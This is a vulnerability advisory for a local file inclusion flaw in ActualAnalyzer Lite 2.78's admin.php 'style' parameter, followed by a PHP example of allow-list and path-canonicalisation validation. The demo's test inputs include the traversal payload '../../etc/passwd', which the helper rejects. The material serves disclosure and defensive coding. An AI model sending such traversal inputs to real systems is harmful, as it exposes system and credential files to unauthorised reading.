vendor: ActualAnalyzer Lite (free)
by: IRCRASH (Dr.Crash Or Khashayar Fereidani)
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: ActualAnalyzer Lite (free)
Affected Version From: 2.78
Affected Version To: 2.78
Patch Exists: NO
Related CWE: N/A
CPE: a:actualscripts:actualanalyzer_lite_free:2.78
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
ActualAnalyzer Lite (free) 2.78 LOCAL FILE INCLUSION
A vulnerability exists in ActualAnalyzer Lite (free) 2.78 that allows an attacker to include a file from the local file system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'style' parameter in the 'admin.php' script. An attacker can exploit it by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable script. This can allow the attacker to include and execute arbitrary local files on the vulnerable system.
Mitigation:
Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
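
The validation described above, as an added example (not code from ActualAnalyzer or from the advisory): a 'style'-type value is accepted only if it is on an allow-list and its canonical path stays inside the style directory. The function name `resolve_style`, the directory layout and the style names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied style name to a file inside $baseDir, or return null.
 * Hypothetical helper; names and layout are assumptions, not the product's code.
 */
function resolve_style(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Allow-list: only exact, known style names are accepted.
    //    Traversal sequences, NUL bytes and case variants all fail here.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise and confirm the result stays under $baseDir.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // missing file, or a symlink pointing outside the directory
    }
    return $path;
}

// Constructed demo: a temporary style directory containing one valid style file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'styles_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'default.php', "<?php // style\n");

$allowed = ['default', 'dark'];   // 'dark' is listed but has no file on disk
$samples = ['default', 'dark', '../../etc/passwd', "default\0", 'DEFAULT'];

foreach ($samples as $input) {
    $resolved = resolve_style($input, $dir, $allowed);
    printf("%-24s => %s\n", json_encode($input), $resolved ?? 'rejected');
}

// Clean up the constructed demo files.
unlink($dir . DIRECTORY_SEPARATOR . 'default.php');
rmdir($dir);
```

Only the value returned by the helper should ever reach `include` or `require`; the raw request parameter should not be concatenated into a path.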